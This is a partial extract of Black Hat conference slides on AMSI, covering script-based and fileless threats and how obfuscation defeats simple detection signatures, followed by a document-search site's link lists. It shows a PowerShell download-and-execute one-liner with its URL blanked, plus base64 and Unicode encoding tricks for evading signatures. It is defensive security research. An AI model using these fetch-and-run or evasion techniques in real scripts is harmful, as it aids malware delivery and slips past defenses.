The Rise and Fall of AMSI - Black Hat Briefings
The Rise and Fall of AMSI
@Tal_Liberman
About me
@Tal_Liberman Research & Reverse Engineering Founder @ Polarium Previously
Head of Research Team @ enSilo #ProcessDoppelg?nging #AtomBombing
Overview
Introduction
Script Based & Fileless Threats Obfuscation The Cat and Mouse Game
AMSI Overview
AMSI from the Developer's Perspective AMSI from the Security Vendor's Perspective
Building and Registering Your Own AMSI Provider Bypassing AMSI Final Thoughts
Script Based Threats
"Script-based malware - on the rise" This is not a trend - it's mainstream There are more script based threats than there are binary threats* Why scripts?
Already available on all target machines Vastly used in domain settings Scripts are faster to develop Minimal skills needed to achieve good functionality Obfuscation of text is more simple than of machine code Harder to monitor scripts than compiled executables
Fileless Threats
A file always has to be run
Assuming the malware survives a reboot
But it can be a MS signed executable being abused Notorious examples are Poweliks and Kovter The main idea is to use a scripting engine to run code via command line Example:
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(`')"
Obfuscation
In software development, obfuscation is the deliberate act of creating source or machine code that is difficult for humans to understand -Wikipedia.
Well... except for the word "humans".
The Cat and Mouse Game
Let's start with a simple example: function Invoke-Malware { Write-Host `Malware!'; }
Simple signature: if script contains "Write-Host `Malware'" Malicious Simple bypass:
function Invoke-Malware { Write-Host "Malware!";
}
Simple signature: if re.findall("Write-Host .Malware.", script) Malicious
Simple bypass: function Invoke-Malware { Write-Host ("Mal" + "ware!"); }
The Cat and Mouse Game
Let's start being a little more sophisticated (just a bit): function Invoke-NotMalware { $malware_base64 = "V3JpdGUtSG9zdCAiTWFsd2FyZSEi"; $malware = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }
Simple signature:
if script contains "V3JpdGUtSG9zdCAiTWFsd2FyZSEi" Malicious
Simple bypass: function Invoke-NotMalware { $malware_base64 = "VwByAGkAdABlAC0ASABvAHMAdAAgACIATQBhAGwAdwBhAHIAZQAhACIA"; $malware = [System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($malware_base64)); IEX ($malware); }
................
................
In order to avoid copyright disputes, this page is only a partial summary.
To fulfill the demand for quickly locating and searching documents.
It is intelligent file search solution for home and business.
Related download
- a hunting story recorded future
- investigating powershell attacks countermeasure
- powershell convert base64 to pdf
- the rise and fall of amsi black hat briefings
- muddywater udurrani
- pingone office 365 deployment
- pingone office 365 deployment ping identity
- powershell for pen tester post exploitation cheat sheet
- decode base64 string to pdf file
- sans powershell cheat sheet
Related searches
- decline and fall of the roman empire
- rise and fall of rome
- decline and fall of rome
- the role and functions of law
- rise and fall of the roman empire
- rise and fall of roman empire
- the efficacy and effectiveness of treatment
- rise and fall of ancient rome
- state the equation and definition of photosynthesis
- the rise and fall of hitler
- the causes and consequences of the holocaust
- the trial and death of socrates pdf